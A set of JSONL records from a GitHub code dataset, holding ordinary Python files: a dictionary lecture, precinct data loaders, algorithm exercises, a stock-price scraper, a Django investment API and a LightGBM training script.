+{"seq_id":"43471764647","text":"# lec6.5-dictionaries.py\n# edX MITx 6.00.1x\n# Introduction to Computer Science and Programming Using Python\n# Lecture 6, video 5\n\n# Demonstration of dictionaries\n# Dict is like a list, but its indices don't have to be integers\n# Dict is a collection of pairs\n# Refer to indices as keys, keys must be immutable\n\n# NOTE: Entries in dictionaries are unordered, can only be accessed\n# by key, not by index\n\nmonthNumbers = {'Jan':1, 'Feb':2, 'Mar':3, 1:'Jan', 2:'Feb', 3:'Mar'}\n\n# Examples of retrieving entries in the dictionary using its key\nmonthNumbers['Jan']\nmonthNumbers[1]\n\n# Can perform insertion. 'Apr' is the key, 4 is the value\nmonthNumbers['Apr'] = 4\n\n# Can iterate through dictionaries\ncollect = []\nfor e in monthNumbers:\n    # Iterate through each item in monthNumbers, append the key to collect\n    collect.append(e)\nprint(collect)\n\n# Can compare the list collect with the keys in monthNumbers\nprint(monthNumbers.keys())\n","repo_name":"slgraff/edx-mitx-6.00.1x","sub_path":"lec6.5-dictionaries.py","file_name":"lec6.5-dictionaries.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"37"}
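A short follow-on sketch (added for illustration, not from the original lecture file): since indexing a missing key raises KeyError, .get() is the safe lookup the notes above stop just short of showing.

monthNumbers.get('May')      # None - 'May' was never inserted
monthNumbers.get('May', 0)   # 0, the supplied default
'Feb' in monthNumbers        # True - membership tests check keys only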
+{"seq_id":"28388003908","text":"import os.path\nimport sys\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))\n\nfrom base import Model, Collection, DATA_DIRECTORY\nfrom csv import DictReader\n\nCOOK_SUBURBAN_PRECINCT_CSV_FILENAME = os.path.join(\n    DATA_DIRECTORY, 'cook_suburban_precincts_as_of_2016.csv')\nCOOK_SUBURBAN_PRECINCT_TRACT_CROSSWALK_CSV_FILENAME = os.path.join(\n    DATA_DIRECTORY, 'suburban_cook_precinct_census_tract_crosswalk.csv')\n\nclass CookSuburbanPrecinct(Model):\n    fields = [\n        'town',\n        'precinctid',\n        'objectid'\n    ]\n\n    def __str__(self):\n        return self.precinctid\n\n    def __repr__(self):\n        return \"CookSuburbanPrecinct(town='{pc.town}', precinctid='{pc.precinctid}', objectid='{pc.objectid}')\".format(\n            pc=self)\n\n\nclass CookSuburbanPrecinctCollection(Collection):\n    model = CookSuburbanPrecinct\n\n    def __init__(self):\n        self._by_precinct_id = {}\n        self._by_town_name = {}\n        self._by_object_id = {}\n        super(CookSuburbanPrecinctCollection, self).__init__()\n\n    def add_item(self, item):\n        super(CookSuburbanPrecinctCollection, self).add_item(item)\n        self._by_precinct_id[item.precinctid] = item\n        self._by_object_id[item.objectid] = item\n        if item.town.lower() not in self._by_town_name:\n            self._by_town_name[item.town.lower()] = []\n        self._by_town_name[item.town.lower()].append(item)\n\n    def transform_row(self, row):\n        return {\n            'town': row['name'],\n            'precinctid': str(row['idpct']),\n            'objectid': row['objectid']\n        }\n\n    def get_by_town_name(self, name):\n        return self._by_town_name.get(str(name).lower(), None)\n\n    def get_by_precinct_id(self, precinctid):\n        return self._by_precinct_id.get(str(precinctid), None)\n\n    def get_by_object_id(self, object_id):\n        return self._by_object_id.get(str(object_id), None)\n\n    def default_sort(self):\n        self._items = sorted(self._items, key=lambda pc: int(pc.precinctid))\n        return self\n\n\nCOOK_SUBURBAN_PRECINCTS = CookSuburbanPrecinctCollection().from_csv(\n    COOK_SUBURBAN_PRECINCT_CSV_FILENAME)\n\n# HACK - this seems duplicative with Chicago precinct crosswalk\nCOOK_SUBURBAN_CROSSWALK = []\nwith open(COOK_SUBURBAN_PRECINCT_TRACT_CROSSWALK_CSV_FILENAME) as fh:\n    reader = DictReader(fh)\n    for row in reader:\n        COOK_SUBURBAN_CROSSWALK.append(row)\n\ndef get_suburban_cook_precincts_from_tract_geoid(geoid, precinct_key='precinct_objectid'):\n    precinct_ids = []\n    for row in COOK_SUBURBAN_CROSSWALK:\n        if row['tract_geoid'] == str(geoid):\n            precinct_ids.append(row.get(precinct_key, None))\n    return precinct_ids\n\ndef get_suburban_cook_tract_from_precinct_number(precinct_id, precinct_key='precinct_objectid'):\n    for row in COOK_SUBURBAN_CROSSWALK:\n        if row.get(precinct_key, None) == str(precinct_id):\n            return row['tract_geoid']\n    return None","repo_name":"newsapps/python-chicago","sub_path":"chicago/cook_suburbs/precincts.py","file_name":"precincts.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"15346892044","text":"# just an extension of LCS\n\n# Top down approach\ndef dp(l1,l2,s,t,cache):\n    \n    if not l1 or not l2:\n        return \"\"\n    elif cache.get((l1,l2)):\n        return cache[(l1,l2)]\n    else:\n        \n        if s[l1-1]==t[l2-1]:\n            cache[(l1,l2)]=dp(l1-1,l2-1,s,t,cache)+s[l1-1]\n            return cache[(l1,l2)]\n        \n        else:\n            sub1,sub2=dp(l1-1,l2,s,t,cache),dp(l1,l2-1,s,t,cache)\n            cache[(l1,l2)]=sub1 if len(sub1)>=len(sub2) else sub2\n            return cache[(l1,l2)]\n\n\n\n\nA,B=input().split()\nm,n=len(A),len(B)\nprint(dp(m,n,A,B,{}))\n\n\n# below is bottom-up approach.\n\"\"\"dp=[[\"\"]*(n+1) for _ in range(m+1)]\nfor i in range(1,m+1):\n    for j in range(1,n+1):\n        if A[i-1]==B[j-1]:\n            dp[i][j]=dp[i-1][j-1]+B[j-1]\n        else:\n            if len(dp[i-1][j])>len(dp[i][j-1]):\n                dp[i][j]=dp[i-1][j]\n            else:\n                dp[i][j]=dp[i][j-1]\nprint(dp[-1][-1])\"\"\"","repo_name":"faisal-git/Data_Structure","sub_path":"DP/print_LCS.py","file_name":"print_LCS.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33156943666","text":"A = [10, 2, 5, 1, 8, 20]\nsample1 = [6, 1, 6, 5, 8, 4]\nsample2 = [2, 20, 7, 55, 1, 33, 12, 4]\nsample3 = [33, 6, 20, 1, 8, 12, 5, 55, 4, 9]\nsample4 = [1, 2, 3, 4, 5, 10]\n\n\ndef solution(A):\n    max_peri = 0\n    n = len(A)\n    A.sort(reverse=True)\n\n    for i in range(0, n - 2):\n        if A[i] < (A[i + 1] + A[i + 2]):\n            max_peri = max(max_peri, A[i] + A[i + 1] + A[i + 2])\n            break\n    if max_peri == 0:\n        return -1\n    else:\n        return max_peri\n\n\nprint(solution(A))\nprint(solution(sample1))\nprint(solution(sample2))\nprint(solution(sample3))\n\nprint(solution(sample4))\n","repo_name":"laoliucn/PythonLearning","sub_path":"maxPerimeter.py","file_name":"maxPerimeter.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23541982356","text":"import requests\nfrom bs4 import BeautifulSoup\n\n# List of stock ticker codes\nCodes = [\n    '005930',\n    '000660',\n    '035720'\n]\nfor Code in Codes:\n    url = f\"https://finance.naver.com/item/sise.naver?code={Code}\"\n\n    # Send a GET request to the site using the requests library's get function\n    # -> store the returned response in the \"response\" variable\n    response = requests.get(url)\n\n    # Turn the response body into an HTML document (use .text to take only the text content)\n    # The raw HTML is just a string, which makes it hard to parse\n    html = response.text\n\n    # So build a BeautifulSoup object from it, so tags and attributes can be queried\n    # BeautifulSoup(first argument = response.text, second argument = \"html.parser\")\n    soup = BeautifulSoup(html, \"html.parser\")\n\n    # Pass the CSS selector as a string\n    price = soup.select_one(\"#_nowVal\").text\n\n    # Use the replace function (string substitution) to strip the unwanted characters\n    # => .replace(\"string to change\", \"replacement string\")\n    price = price.replace(\",\", \"\")\n\n    print(price)","repo_name":"Jaeil-Lee/1_Grade","sub_path":"1_Semester/Python/2. Personal learning/02. 인프런/02. 네이버_주식현재가_크롤링/01. 데이터 추출.py","file_name":"01. 
데이터 추출.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25932241034","text":"from typing import List, Optional\nfrom padam.parts import Part\nfrom padam.parts.panel import Panel\nfrom solid import OpenSCADObject, rotate\nfrom solid.utils import back, right, up\n\n\nclass Frame(Part):\n def __init__(\n self,\n length: Optional[int] = 1200,\n height: Optional[int] = 700,\n depth: Optional[int] = 600,\n thickness: Optional[float] = 18,\n material: Optional[str] = None,\n top_thickness: Optional[float] = None,\n bottom_thickness: Optional[float] = None,\n side_thickness: Optional[float] = None,\n top_material: Optional[str] = None,\n bottom_material: Optional[str] = None,\n side_material: Optional[str] = None,\n top_slitted: Optional[bool] = True,\n top_front_depth: Optional[int] = 100,\n top_back_depth: Optional[int] = 100,\n name: Optional[str] = None,\n ):\n super().__init__(name=name)\n self.length = length\n self.height = height\n self.depth = depth\n self.top_thickness = top_thickness or thickness\n self.bottom_thickness = bottom_thickness or thickness\n self.side_thickness = side_thickness or thickness\n self.top_material = top_material or material\n self.bottom_material = bottom_material or material\n self.side_material = side_material or material\n self.top_slitted = top_slitted\n self.top_front_depth = top_front_depth\n self.top_back_depth = top_back_depth\n # calculated attributes\n self.interior_length: float = self.length - 2 * self.side_thickness\n self.interior_height: float = self.height - self.top_thickness - self.bottom_thickness\n # parts\n self.top_panel = self.add_part(Panel(self.interior_length, self.depth, self.top_thickness, name='top_panel', material=self.top_material))\n self.bottom_panel = self.add_part(Panel(self.interior_length, self.depth, self.bottom_thickness, name='bottom_panel', material=self.bottom_material))\n self.left_panel = self.add_part(Panel(self.height, self.depth, self.side_thickness, name='left_panel', material=self.side_material))\n self.right_panel = self.add_part(Panel(self.height, self.depth, self.side_thickness, name='right_panel', material=self.side_material))\n\n def get_objects(self) -> List[OpenSCADObject]:\n top_panel = up(self.height - self.top_thickness)(self.top_panel.get_object())\n bottom_panel = self.bottom_panel.get_object()\n left_panel = rotate([0, -90, 0])(self.left_panel.get_object())\n right_panel = right(self.length - self.side_thickness)(rotate([0, -90, 0])(self.right_panel.get_object()))\n panels = [top_panel, bottom_panel, left_panel, right_panel]\n panels = [right(self.side_thickness)(p) for p in panels]\n panels = [back(self.depth)(p) for p in panels]\n return panels\n\n def get_params(self) -> List[tuple]:\n return super().get_params() + [\n ('length', self.length),\n ('height', self.height),\n ('depth', self.depth),\n ('top_thickness', self.top_thickness),\n ('bottom_thickness', self.bottom_thickness),\n ('side_thickness', self.side_thickness),\n ('top_material', self.top_material),\n ('bottom_material', self.bottom_material),\n ('side_material', self.side_material),\n ]\n","repo_name":"madron/padam","sub_path":"padam/parts/frame.py","file_name":"frame.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73608456107","text":"import xlwt\nimport urllib\nimport json\n\nfrom django.views import View\nfrom django.http 
import JsonResponse, HttpResponse\nfrom django.utils import timezone\nfrom django.db.models import Sum, Q, Prefetch\nfrom django.db import transaction, IntegrityError\n\nfrom users.utils import user_validator\nfrom investments.utils import Portfolio\nfrom investments.models import PaybackSchedule, UserDeal, UserPayback\nfrom deals.models import Deal\nfrom users.models import User\n\nclass InvestmentHistoryView(View):\n @user_validator\n def get(self, request):\n try:\n signed_user = request.user\n PAGE_SIZE = 10\n offset = int(request.GET.get('offset', 0))\n limit = int(request.GET.get('limit', PAGE_SIZE)) + offset\n status = request.GET.get('status', None)\n search = request.GET.get('search', None)\n user_deals = UserDeal.objects.filter(user=signed_user).select_related('deal')\n q = Q()\n\n count_by_status = {\"all\": len(user_deals)}\n\n for deal_status in Deal.Status.__members__:\n count_by_status[Deal.Status[deal_status]] = len(user_deals.filter(deal__status=Deal.Status[deal_status]))\n\n if status:\n q &= Q(deal__status=status)\n\n if search:\n q &= Q(deal__name__contains=search) | Q(deal__id__contains=search)\n\n investments = user_deals.filter(q).prefetch_related(\n Prefetch('userpayback_set', to_attr='paybacks'),\n Prefetch('userpayback_set', queryset=UserPayback.objects.filter(state=UserPayback.State.PAID.value), to_attr='paid_paybacks')\n )\n\n summary = {\n \"total\" : sum(investment.amount for investment in investments),\n \"paidTotal\" : investments.filter(userpayback__state=UserPayback.State.PAID.value)\\\n .aggregate(paid_total=Sum('userpayback__principal'))['paid_total'],\n \"paidInterest\": investments.filter(userpayback__state=UserPayback.State.PAID.value)\\\n .aggregate(paid_interest=Sum('userpayback__interest'))['paid_interest']\n }\n\n items = [\n {\n \"id\" : investment.id,\n \"dealIndex\" : investment.deal.id,\n \"item\" : investment.deal.name,\n \"amount\" : investment.amount,\n \"principal\" : sum(payback.principal for payback in investment.paybacks),\n \"interest\" : sum(payback.interest for payback in investment.paybacks),\n \"date\" : timezone.localtime(investment.created_at).strftime(\"%y.%m.%d\"),\n \"grade\" : Deal.Grade(investment.deal.grade).label,\n \"interestRate\": investment.deal.earning_rate,\n \"term\" : investment.deal.repayment_period,\n \"status\" : investment.deal.status,\n \"repayment\" : int((sum(paid_payback.principal for paid_payback in investment.paid_paybacks) / investment.amount) * 100),\n \"cycle\" : len(investment.paid_paybacks),\n \"isCancelable\": investment.created_at + timezone.timedelta(days=1) < timezone.now(),\n } for investment in investments.order_by('-created_at')[offset:limit]\n ]\n return JsonResponse({\"summary\":summary,\"count\": count_by_status, \"items\":items}, status=200)\n\n except ValueError:\n return JsonResponse({\"message\":'VALUE_ERROR'}, status=400)\n\nclass InvestmentPortfolioView(View):\n @user_validator\n def get(self, request):\n user = request.user\n\n user_deals = list(user.userdeal_set.all().prefetch_related('deal'))\n\n portfolio = Portfolio()\n\n for user_deal in user_deals:\n portfolio.sort_deal(user_deal)\n\n results = {\n 'grade' : portfolio.grade,\n 'earningRate' : portfolio.earning_rate,\n 'category' : portfolio.category\n }\n \n return JsonResponse({\"results\": results}, status=200)\n\nclass InvestmentSummaryView(View):\n @user_validator\n def get(self, request):\n user = request.user\n \n user_deals_by_status = {}\n for deal_status in Deal.Status.__members__:\n user_deals_by_status[deal_status] = 
user.userdeal_set.filter(\n Q(deal__status = Deal.Status[deal_status])\n ).prefetch_related(\n Prefetch(\n 'userpayback_set',\n queryset = UserPayback.objects.all(),\n to_attr = 'all_paybacks'\n ),\n Prefetch(\n 'userpayback_set',\n queryset = UserPayback.objects.filter(state=UserPayback.State.PAID.value),\n to_attr = 'paid_paybacks'\n ),\n )\n\n user_deals_by_status_sums = {}\n for key, filtered_user_deals in user_deals_by_status.items():\n user_deals_by_status_sums[key] = {\n 'total_amount' : int(filtered_user_deals.aggregate(Sum('amount'))['amount__sum'] or 0),\n 'total_interest' : sum(sum(payback.interest for payback in user_deal.all_paybacks) for user_deal in filtered_user_deals),\n 'total_commission' : sum(sum(payback.commission for payback in user_deal.all_paybacks) for user_deal in filtered_user_deals),\n 'paid_principal' : sum(sum(payback.principal for payback in user_deal.paid_paybacks) for user_deal in filtered_user_deals),\n 'paid_interest' : sum(sum(payback.interest for payback in user_deal.paid_paybacks) for user_deal in filtered_user_deals),\n 'paid_commission' : sum(sum(payback.commission for payback in user_deal.paid_paybacks) for user_deal in filtered_user_deals)\n }\n\n applying_invest_amount = user_deals_by_status_sums['APPLYING']['total_amount'] - \\\n user_deals_by_status_sums['APPLYING']['paid_principal']\n normal_invest_amount = user_deals_by_status_sums['NORMAL']['total_amount'] - \\\n user_deals_by_status_sums['NORMAL']['paid_principal']\n delay_invest_amount = user_deals_by_status_sums['DELAY']['total_amount'] - \\\n user_deals_by_status_sums['DELAY']['paid_principal']\n overdue_invest_amount = user_deals_by_status_sums['OVERDUE']['total_amount'] - \\\n user_deals_by_status_sums['OVERDUE']['paid_principal']\n nonperform_invest_amount = user_deals_by_status_sums['NONPERFORM']['total_amount'] - \\\n user_deals_by_status_sums['NONPERFORM']['paid_principal']\n loss_amount = user_deals_by_status_sums['NONPERFORM_COMPLETION']['total_amount'] - \\\n user_deals_by_status_sums['NONPERFORM_COMPLETION']['paid_principal']\n\n invested_amount = sum(value['total_amount'] for value in user_deals_by_status_sums.values())\n complete_amount = sum(value['paid_principal'] for value in user_deals_by_status_sums.values())\n invest_amount = applying_invest_amount + normal_invest_amount + delay_invest_amount + \\\n overdue_invest_amount + nonperform_invest_amount\n\n paid_revenue = sum(value['paid_interest'] for value in user_deals_by_status_sums.values()) - \\\n sum(value['paid_commission'] for value in user_deals_by_status_sums.values())\n\n total_revenue = sum(value['total_interest'] for value in user_deals_by_status_sums.values()) - \\\n sum(value['total_commission'] for value in user_deals_by_status_sums.values())\n \n mortgage_deals = user.userdeal_set.filter(\n Q(deal__category=Deal.Category.MORTGAGE.value)\n ).prefetch_related(\n Prefetch('userpayback_set', queryset=UserPayback.objects.filter(~Q(state=UserPayback.State.PAID.value)), to_attr='left_paybacks')\n )\n \n invest_mortgage_amount = sum(sum(payback.principal for payback in mortgage_deal.left_paybacks) for mortgage_deal in mortgage_deals)\n\n deposit = {\n 'bank' : user.deposit_bank.name,\n 'account' : user.deposit_account,\n 'balance' : user.deposit_amount\n }\n\n invest_limit = {\n 'total' : user.net_invest_limit,\n 'remainTotal' : user.net_invest_limit - invest_amount,\n 'remainEstate' : user.net_mortgage_invest_limit - invest_mortgage_amount \n }\n\n overview = {\n 'earningRate' : round((total_revenue - loss_amount) / 
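Two idioms from the summary arithmetic above, shown in isolation: aggregate(Sum(...)) yields None on an empty queryset, hence the `or 0` guard, and the payback totals are plain nested generator sums over the prefetched to_attr lists. A toy version of the latter with stand-in objects:

class Payback:  # stand-in for a UserPayback row (hypothetical)
    def __init__(self, interest):
        self.interest = interest

# paybacks grouped per user deal, as Prefetch(..., to_attr=...) produces them
deals = [[Payback(10), Payback(20)], [Payback(5)]]
total_interest = sum(sum(p.interest for p in d) for d in deals)
assert total_interest == 35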
complete_amount * 100, 2),\n 'asset' : user.deposit_amount + invest_amount,\n 'paidRevenue' : paid_revenue\n }\n\n invest_status = {\n 'totalInvest' : invested_amount,\n 'complete' : complete_amount,\n 'delay' : delay_invest_amount,\n 'invest' : invest_amount,\n 'loss' : loss_amount,\n 'normal' : normal_invest_amount + applying_invest_amount,\n 'overdue' : overdue_invest_amount,\n 'nonperform' : nonperform_invest_amount\n }\n\n results = {\n 'deposit' : deposit,\n 'investLimit' : invest_limit,\n 'overview' : overview,\n 'investStatus' : invest_status\n }\n\n return JsonResponse({\"results\": results}, status=200)\n \nclass XlsxExportView(View):\n @user_validator\n def get(self, request):\n filename = urllib.parse.quote(\n f'[{timezone.localdate().strftime(\"%Y-%m-%d\")}] 투자 내역 다운로드.xlsx'.encode('utf-8')\n )\n response = HttpResponse(content_type=\"application/vnd.ms-excel\")\n response[\"Content-Disposition\"] = 'attachment;filename*=UTF-8\\'\\'%s' % filename\n wb = xlwt.Workbook(encoding='ansi')\n ws = wb.add_sheet('투자내역')\n signed_user = request.user\n\n row_number = 0\n column_names = [\n '투자일',\n '상품호수', \n '상품명', \n '등급', \n '예상수익률(%)', \n '투자기간(개월)', \n '투자금액', \n '지급받은 원금', \n '지급받은 이자',\n '세금', \n '커미션'\n ]\n\n for index, column_name in enumerate(column_names):\n ws.write(row_number, index, column_name)\n\n\n investments = UserDeal.objects.filter(user=signed_user).select_related('deal').prefetch_related(\n Prefetch('userpayback_set', to_attr='paybacks'),\n Prefetch(\n 'userpayback_set', \n queryset=UserPayback.objects.filter(state=UserPayback.State.PAID.value), \n to_attr='paid_paybacks')\n )\n\n rows = [\n [\n timezone.localtime(investment.created_at).strftime(\"%Y-%m-%d\"),\n investment.id,\n investment.deal.name,\n Deal.Grade(investment.deal.grade).label,\n investment.deal.earning_rate,\n investment.deal.repayment_period,\n investment.amount,\n sum(paid_payback.principal for paid_payback in investment.paid_paybacks),\n sum(paid_payback.interest for paid_payback in investment.paid_paybacks),\n sum(paid_payback.tax for paid_payback in investment.paid_paybacks),\n sum(paid_payback.commission for paid_payback in investment.paid_paybacks)\n ] for investment in investments\n ]\n\n for row in rows:\n row_number +=1\n for column_number, attribute in enumerate(row):\n ws.write(row_number, column_number, attribute)\n\n wb.save(response)\n\n return response\n\nclass InvestmentDealView(View):\n @user_validator\n def post(self, request):\n try:\n user = request.user\n data = json.loads(request.body)\n\n user_deals = []\n for deal_data in data['investments']:\n deal = Deal.objects.get(id=deal_data['id'], status=Deal.Status.APPLYING.value)\n amount = deal_data['amount']\n payback_schedule = PaybackSchedule.objects.filter(deal=deal, option=amount)\n\n if not payback_schedule:\n return JsonResponse({\"message\": \"INVALID_OPTION\"}, status=400) \n\n user_deal = {\n 'deal' : deal,\n 'amount' : amount,\n 'payback_schedule': payback_schedule\n }\n user_deals.append(user_deal)\n\n with transaction.atomic():\n for user_deal in user_deals:\n\n userdeal = UserDeal.objects.create(\n deal = user_deal['deal'],\n user = user,\n amount = user_deal['amount']\n )\n\n UserPayback.objects.bulk_create([\n UserPayback(\n users_deals = userdeal,\n principal = payback.principal,\n interest = payback.interest,\n tax = payback.tax,\n commission = payback.commission,\n payback_round = payback.payback_round,\n state = UserPayback.State.TOBE_PAID.value,\n payback_date = payback.payback_date\n ) for payback in 
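A stand-alone version of the xlwt export pattern above; xlwt's save() accepts any writable binary stream (the view passes the HttpResponse directly), and 'utf-8' is a safer workbook encoding than 'ansi' for the Korean column names:

import io
import xlwt

wb = xlwt.Workbook(encoding='utf-8')
ws = wb.add_sheet('sheet1')
for col, name in enumerate(['date', 'amount']):            # header row
    ws.write(0, col, name)
for row, record in enumerate([('2021-01-01', 100)], start=1):
    for col, value in enumerate(record):
        ws.write(row, col, value)
buf = io.BytesIO()
wb.save(buf)   # works the same with a Django HttpResponse as the target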
user_deal['payback_schedule']\n ])\n\n\n return JsonResponse({\"message\": \"SUCCESS\"}, status=201)\n\n except KeyError:\n return JsonResponse({\"message\": \"KEY_ERROR\"}, status=400)\n\n except Deal.DoesNotExist:\n return JsonResponse({\"message\": \"INVALID_DEAL\"}, status=400)\n \n except IntegrityError:\n return JsonResponse({\"message\": \"INVESTD_DEAL\"}, status=400)\n \n @user_validator\n def get(self, request):\n try:\n user = request.user\n deals_id = request.GET.get('deals').split(\",\")\n deals = Deal.objects.filter(id__in=deals_id)\n\n invest_info = [{\n \"id\" : deal.id,\n \"name\" : deal.name,\n \"category\" : Deal.Category(deal.category).label,\n \"grade\" : Deal.Grade(deal.grade).label,\n \"earningRate\" : deal.earning_rate,\n \"repaymentPeriod\" : deal.repayment_period,\n \"amount\" : deal.userdeal_set.aggregate(total_price=Sum('amount'))['total_price'] or 0,\n \"investmentOption\": [option.value for option in PaybackSchedule.Option]\n } for deal in deals]\n\n results = {\n 'investInfo' : invest_info,\n 'depositAmount' : user.deposit_amount,\n 'name' : user.name,\n 'depositBank' : user.deposit_bank.name,\n 'depositAccount' : user.deposit_account,\n }\n\n return JsonResponse({\"results\" : results}, status=200)\n except Deal.DoesNotExist: \n return JsonResponse({\"message\":\"INVALID_ERROR\"}, status=400)\n","repo_name":"JeonSoohyun27/PROJECT-22percent","sub_path":"investments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15984,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34255698281","text":"import pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\nfrom sklearn.metrics import roc_auc_score\nfrom lightgbm.sklearn import LGBMClassifier\nfrom collections import defaultdict\nimport gc\nimport time\nfrom sklearn.decomposition import PCA\nfrom gensim.models import Word2Vec\nimport random\npd.set_option('display.max_columns', None)\n\nnp.random.seed(2021)\n\ndef reduce_mem(df, cols):\n start_mem = df.memory_usage().sum() / 1024 ** 2\n for col in tqdm(cols):\n col_type = df[col].dtypes\n if col_type != object:\n c_min = df[col].min()\n c_max = df[col].max()\n if str(col_type)[:3] == 'int':\n if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max:\n df[col] = df[col].astype(np.int8)\n elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:\n df[col] = df[col].astype(np.int16)\n elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:\n df[col] = df[col].astype(np.int32)\n elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:\n df[col] = df[col].astype(np.int64)\n else:\n if c_min > np.finfo(np.float16).min and c_max < np.finfo(np.float16).max:\n df[col] = df[col].astype(np.float16)\n elif c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max:\n df[col] = df[col].astype(np.float32)\n else:\n df[col] = df[col].astype(np.float64)\n\n end_mem = df.memory_usage().sum() / 1024 ** 2\n print('{:.2f} Mb, {:.2f} Mb ({:.2f} %)'.format(start_mem, end_mem, 100 * (start_mem - end_mem) / start_mem))\n gc.collect()\n return df\n\n## 从官方baseline里面抽出来的评测函数\ndef uAUC(labels, preds, user_id_list):\n \"\"\"Calculate user AUC\"\"\"\n user_pred = defaultdict(lambda: [])\n user_truth = defaultdict(lambda: [])\n for idx, truth in enumerate(labels):\n user_id = user_id_list[idx]\n pred = preds[idx]\n truth = labels[idx]\n user_pred[user_id].append(pred)\n user_truth[user_id].append(truth)\n user_flag = defaultdict(lambda: False)\n for 
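The per-column dtype downcasting that reduce_mem() implements by hand has a close built-in alternative, sketched here: pd.to_numeric picks the smallest safe dtype in one call (it stops at float32, while reduce_mem also tries float16):

import pandas as pd

df = pd.DataFrame({'a': [1, 2, 3], 'b': [0.5, 0.25, 0.125]})
df['a'] = pd.to_numeric(df['a'], downcast='integer')  # int64 -> int8 here
df['b'] = pd.to_numeric(df['b'], downcast='float')    # float64 -> float32
assert str(df['a'].dtype) == 'int8'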
user_id in set(user_id_list):\n truths = user_truth[user_id]\n flag = False\n # 若全是正样本或全是负样本,则flag为False\n for i in range(len(truths) - 1):\n if truths[i] != truths[i + 1]:\n flag = True\n break\n user_flag[user_id] = flag\n total_auc = 0.0\n size = 0.0\n for user_id in user_flag:\n if user_flag[user_id]:\n auc = roc_auc_score(np.asarray(user_truth[user_id]), np.asarray(user_pred[user_id]))\n total_auc += auc\n size += 1.0\n user_auc = float(total_auc)/size\n return user_auc\n\ny_list = ['read_comment', 'like', 'click_avatar', 'forward', 'favorite', 'comment', 'follow']\nmax_day = 15\n\n##\n\ncross = pd.read_pickle('extract_feature_cross.pkl')\nhistory = pd.read_pickle('extract_feature_history.pkl')\nembedding = pd.read_pickle('extract_feature_embedding.pkl')\n# embedding_10 = pd.read_pickle('extract_feature_embedding_10.pkl')\nfeedemb = pd.read_pickle('extract_feature_feedemb.pkl')\n# deepwalk = pd.read_pickle('extract_feature_deepwalk.pkl')\n\ndf = pd.concat([history,cross,feedemb,embedding],axis=1)\nprint('read finish')\n\n\nprint(df[:4],df[-4:])\n\nplay_cols = ['is_finish', 'play_times','play', 'stay']\n# # 内存够用的不需要做这一步\n# df = reduce_mem(df, [f for f in df.columns if f not in ['date_'] + play_cols + y_list])\n# print(df[:4])\ntrain = df[~df['read_comment'].isna()].reset_index(drop=True)\ntest = df[df['read_comment'].isna()].reset_index(drop=True)\ncols = [f for f in df.columns if f not in ['date_']+ play_cols + y_list]\ndf = df.fillna(0)\n\n\ndel df\ngc.collect()\n\n# + play_cols + y_list]\nprint(train[cols].shape)\nprint(cols)\n\ntrn_x = train[train['date_'] < 14].reset_index(drop=True)\nval_x = train[train['date_'] == 14].reset_index(drop=True)\n\n\n##################### 线下验证 #####################\nuauc_list = []\nr_list = []\nfor y in y_list[:4]:\n print('=========', y, '=========')\n fold_importance_df = pd.DataFrame()\n fold_importance_df[\"Feature\"] = cols\n t = time.time()\n clf = LGBMClassifier(\n learning_rate=0.01,\n n_estimators=5000,\n num_leaves=63,\n subsample=0.8,\n colsample_bytree=0.8,\n random_state=2021,\n metric='None',\n )\n clf.fit(\n trn_x[cols], trn_x[y],\n eval_set=[(val_x[cols], val_x[y])],\n eval_metric='auc',\n early_stopping_rounds=100,\n verbose=50\n )\n fold_importance_df[f'imp'] = clf.feature_importances_\n val_x[y + '_score'] = clf.predict_proba(val_x[cols])[:, 1]\n val_uauc = uAUC(val_x[y], val_x[y + '_score'], val_x['userid'])\n uauc_list.append(val_uauc)\n print(val_uauc)\n fold_importance_df.sort_values(by='imp', ascending=False, inplace=True)\n print(fold_importance_df[['Feature', 'imp']])\n r_list.append(clf.best_iteration_)\n print('runtime: {}\\n'.format(time.time() - t))\nweighted_uauc = 0.4 * uauc_list[0] + 0.3 * uauc_list[1] + 0.2 * uauc_list[2] + 0.1 * uauc_list[3]\nprint(uauc_list)\nprint(weighted_uauc)\ndel trn_x ,val_x\ngc.collect()\n##################### 全量训练 #####################\nr_dict = dict(zip(y_list[:4], r_list))\nfor y in y_list[:4]:\n print('=========', y, '=========')\n t = time.time()\n clf = LGBMClassifier(\n learning_rate=0.01,\n n_estimators=r_dict[y],\n num_leaves=63,\n subsample=0.8,\n colsample_bytree=0.8,\n random_state=2021,\n metric='auc',\n )\n clf.fit(\n train[cols], train[y],\n eval_set=[(train[cols], train[y])],\n early_stopping_rounds=r_dict[y],\n eval_metric='auc',\n verbose=100\n )\n test[y] = clf.predict_proba(test[cols])[:, 1]\n print('runtime: {}\\n'.format(time.time() - t))\ntest[['userid', 'feedid'] + y_list[:4]].to_csv('sub_%.6f_%.6f_%.6f_%.6f_%.6f.csv' % (weighted_uauc, uauc_list[0], uauc_list[1], 
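The uAUC metric above rewritten with a pandas groupby — same semantics as the loop version (and as its Chinese comment notes): users whose labels are all one class are skipped, and the remaining per-user AUCs are averaged unweighted:

import numpy as np
import pandas as pd
from sklearn.metrics import roc_auc_score

def uauc(labels, preds, user_ids):
    df = pd.DataFrame({'y': labels, 'p': preds, 'u': user_ids})
    aucs = [roc_auc_score(g['y'], g['p'])
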